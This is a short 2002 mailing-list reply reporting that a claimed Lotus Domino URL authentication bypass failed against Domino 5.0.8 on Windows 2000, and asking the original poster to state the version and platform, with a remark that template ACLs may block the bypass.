Antwort: Lotus Domino url bypass

From: j.mickertsat_private
Date: Mon Feb 04 2002 - 00:35:37 PST

    Hi,

    this does not work for me. I tested it against Domino 5.0.8 on Windows
    2000 SP2 with all actual patches. I get redirected to the login-page. How
    are your ACLs on the template? Mine do not allow Anonymous or Default any
    access. Maybe this corrects the issue. I also use SSL to connect, but this
    should not interfere with the exploit. Maybe you should state version and
    platform.

    Kind regards,

    Jens Mickerts

    "Gabriel A. Maggiotti" <gmaggiotat_private>
    Gesendet von: gabiat_private
    04.02.2002 04:30
    Bitte antworten an gmaggiot